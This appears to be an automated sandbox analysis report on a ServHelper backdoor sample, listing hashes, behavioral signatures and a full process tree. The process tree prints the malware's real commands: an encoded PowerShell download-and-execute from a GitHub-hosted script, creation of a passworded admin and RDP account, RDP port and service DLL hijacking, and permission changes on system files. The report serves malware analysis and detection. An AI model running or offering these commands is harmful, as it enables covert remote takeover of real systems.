Analysis
- max time kernel: 122s
- max time network: 56s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 21-07-2021 08:34

Static task: static1
Behavioral task: behavioral1
- Sample: exe1.bin.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: exe1.bin.exe
- Resource: win10v20210408
General
- Target: exe1.bin.exe
- Size: 4.6MB
- MD5: eaee663dfeb2efcd9ec669f5622858e2
- SHA1: 2b96f0d568128240d0c53b2a191467fde440fd93
- SHA256: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
- SHA512: 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoCs)
  Processes:
    flow | pid | process
    10 | 572 | powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Possible privilege escalation attempt (8 IoCs)
  Processes:
    pid | process
    400 | icacls.exe
    1992 | icacls.exe
    1096 | takeown.exe
    1512 | icacls.exe
    1376 | icacls.exe
    640 | icacls.exe
    1400 | icacls.exe
    1680 | icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
    resource | yara_rule
    \Windows\Branding\mediasrv.png | upx
    \Windows\Branding\mediasvc.png | upx
- Loads dropped DLL (2 IoCs)
  Processes:
    pid | process
    640 |
    640 |
- Modifies file permissions (1 TTPs, 8 IoCs)
  Processes:
    pid | process
    1096 | takeown.exe
    1512 | icacls.exe
    1376 | icacls.exe
    640 | icacls.exe
    1400 | icacls.exe
    1680 | icacls.exe
    400 | icacls.exe
    1992 | icacls.exe
- Drops file in System32 directory (1 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Windows\system32\rfxvmt.dll | powershell.exe
- Drops file in Windows directory (21 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Windows\branding\mediasvc.png | powershell.exe
    File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
    File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f42944ec-9aba-4155-b2e5-50cb54a22111 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c98d4041-b55c-4eb1-9792-558893ba0c0b | powershell.exe
    File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_726981a4-5076-485d-b7ff-0fb44911cbad | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0e809173-61d3-412d-ac6e-9fbd5f4b78a8 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a16d5b34-517d-48eb-9f3a-1a1024b8c14b | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96372b89-a098-4f02-ab16-8a2539735215 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c30dd62-adb6-4135-9aa7-86711b61059a | powershell.exe
    File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
    File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
    File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4ZDVNZDF6ALCEJUAZG0H.temp | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3796fa19-1610-4298-9379-36101e4a987c | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a7b921b-8d1c-4a5e-b409-adefc2f95789 | powershell.exe
    File created | C:\Windows\branding\mediasrv.png | powershell.exe
    File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a56b47a-1b63-462e-a2fb-fb7874dcc10e | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9797b473-f1df-4617-bcdd-d9bd4c03daa9 | powershell.exe
- Modifies data under HKEY_USERS (4 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
    Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0834cbe0b7ed701 | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
    pid | process
    756 | powershell.exe
    756 | powershell.exe
    544 | powershell.exe
    544 | powershell.exe
    1372 | powershell.exe
    1372 | powershell.exe
    1104 | powershell.exe
    1104 | powershell.exe
    756 | powershell.exe
    756 | powershell.exe
    756 | powershell.exe
    572 | powershell.exe
    572 | powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes:
    pid | process
    472 |
    640 |
    640 |
    640 |
    640 |
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 756 | powershell.exe
    Token: SeDebugPrivilege | 544 | powershell.exe
    Token: SeDebugPrivilege | 1372 | powershell.exe
    Token: SeDebugPrivilege | 1104 | powershell.exe
    Token: SeRestorePrivilege | 1376 | icacls.exe
    Token: SeAssignPrimaryTokenPrivilege | 1984 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 1984 | WMIC.exe
    Token: SeAuditPrivilege | 1984 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 1984 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 1984 | WMIC.exe
    Token: SeAuditPrivilege | 1984 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 836 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 836 | WMIC.exe
    Token: SeAuditPrivilege | 836 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 836 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 836 | WMIC.exe
    Token: SeAuditPrivilege | 836 | WMIC.exe
    Token: SeDebugPrivilege | 572 | powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (each row is logged the number of times given in the last column; the counts sum to 64):
    description | pid | process | target process | count
    PID 2040 wrote to memory of 756 | 2040 | exe1.bin.exe | powershell.exe | 3
    PID 756 wrote to memory of 584 | 756 | powershell.exe | csc.exe | 3
    PID 584 wrote to memory of 972 | 584 | csc.exe | cvtres.exe | 3
    PID 756 wrote to memory of 544 | 756 | powershell.exe | powershell.exe | 3
    PID 756 wrote to memory of 1372 | 756 | powershell.exe | powershell.exe | 3
    PID 756 wrote to memory of 1104 | 756 | powershell.exe | powershell.exe | 3
    PID 756 wrote to memory of 1096 | 756 | powershell.exe | takeown.exe | 3
    PID 756 wrote to memory of 1512 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 1376 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 640 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 1400 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 1680 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 400 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 1992 | 756 | powershell.exe | icacls.exe | 3
    PID 756 wrote to memory of 572 | 756 | powershell.exe | reg.exe | 3
    PID 756 wrote to memory of 1668 | 756 | powershell.exe | reg.exe | 3
    PID 756 wrote to memory of 1788 | 756 | powershell.exe | reg.exe | 3
    PID 756 wrote to memory of 820 | 756 | powershell.exe | net.exe | 3
    PID 820 wrote to memory of 1984 | 820 | net.exe | net1.exe | 3
    PID 756 wrote to memory of 1660 | 756 | powershell.exe | cmd.exe | 3
    PID 1660 wrote to memory of 1588 | 1660 | cmd.exe | cmd.exe | 3
    PID 1588 wrote to memory of 1360 | 1588 | cmd.exe | net.exe | 1
Processes
- C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe (depth 1, PID 2040)
  Command line: "C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 756)
  Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3, PID 584)
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tallksh0\tallksh0.cmdline"
  - Suspicious use of WriteProcessMemory
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4, PID 972)
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F13.tmp" "c:\Users\Admin\AppData\Local\Temp\tallksh0\CSC262750DE54D448CAA53F6412757B70.TMP"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 544)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 1372)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 1104)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\takeown.exe (depth 3, PID 1096)
  Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 1512)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 1376)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\icacls.exe (depth 3, PID 640)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 1400)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 1680)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 400)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\icacls.exe (depth 3, PID 1992)
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  - Possible privilege escalation attempt
  - Modifies file permissions
- C:\Windows\system32\reg.exe (depth 3, PID 572)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- C:\Windows\system32\reg.exe (depth 3, PID 1668)
  Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  - Modifies registry key
- C:\Windows\system32\reg.exe (depth 3, PID 1788)
  Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
- C:\Windows\system32\net.exe (depth 3, PID 820)
  Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe (depth 4, PID 1984)
  Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- C:\Windows\system32\cmd.exe (depth 3, PID 1660)
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\cmd.exe (depth 4, PID 1588)
  Command line: cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net.exe (depth 5, PID 1360)
  Command line: net start rdpdr
- C:\Windows\system32\net1.exe (depth 6, PID 1608)
  Command line: C:\Windows\system32\net1 start rdpdr
- C:\Windows\system32\cmd.exe (depth 3, PID 1892)
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- C:\Windows\system32\cmd.exe (depth 4, PID 584)
  Command line: cmd /c net start TermService
- C:\Windows\system32\net.exe (depth 5, PID 1336)
  Command line: net start TermService
- C:\Windows\system32\net1.exe (depth 6, PID 348)
  Command line: C:\Windows\system32\net1 start TermService
- C:\Windows\system32\cmd.exe (depth 3, PID 1336)
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
- C:\Windows\system32\cmd.exe (depth 3, PID 1984)
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (depth 1, PID 400)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
- C:\Windows\system32\net.exe (depth 2, PID 572)
  Command line: net.exe user WgaUtilAcc 000000 /del
- C:\Windows\system32\net1.exe (depth 3, PID 1668)
  Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (depth 1, PID 804)
  Command line: cmd /C net.exe user WgaUtilAcc MIhLLINc /add
- C:\Windows\system32\net.exe (depth 2, PID 1776)
  Command line: net.exe user WgaUtilAcc MIhLLINc /add
- C:\Windows\system32\net1.exe (depth 3, PID 1408)
  Command line: C:\Windows\system32\net1 user WgaUtilAcc MIhLLINc /add
- C:\Windows\System32\cmd.exe (depth 1, PID 1588)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\system32\net.exe (depth 2, PID 1156)
  Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\system32\net1.exe (depth 3, PID 1084)
  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1, PID 572)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
- C:\Windows\system32\net.exe (depth 2, PID 1668)
  Command line: net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
- C:\Windows\system32\net1.exe (depth 3, PID 1996)
  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
- C:\Windows\System32\cmd.exe (depth 1, PID 1776)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\system32\net.exe (depth 2, PID 1504)
  Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\system32\net1.exe (depth 3, PID 1340)
  Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1, PID 1156)
  Command line: cmd /C net.exe user WgaUtilAcc MIhLLINc
- C:\Windows\system32\net.exe (depth 2, PID 1660)
  Command line: net.exe user WgaUtilAcc MIhLLINc
- C:\Windows\system32\net1.exe (depth 3, PID 976)
  Command line: C:\Windows\system32\net1 user WgaUtilAcc MIhLLINc
- C:\Windows\System32\cmd.exe (depth 1, PID 1996)
  Command line: cmd.exe /C wmic path win32_VideoController get name
- C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 1984)
  Command line: wmic path win32_VideoController get name
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (depth 1, PID 1104)
  Command line: cmd.exe /C wmic CPU get NAME
- C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 836)
  Command line: wmic CPU get NAME
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (depth 1, PID 1760)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- C:\Windows\system32\cmd.exe (depth 2, PID 860)
  Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 572)
  Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Blocklisted process makes network request
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads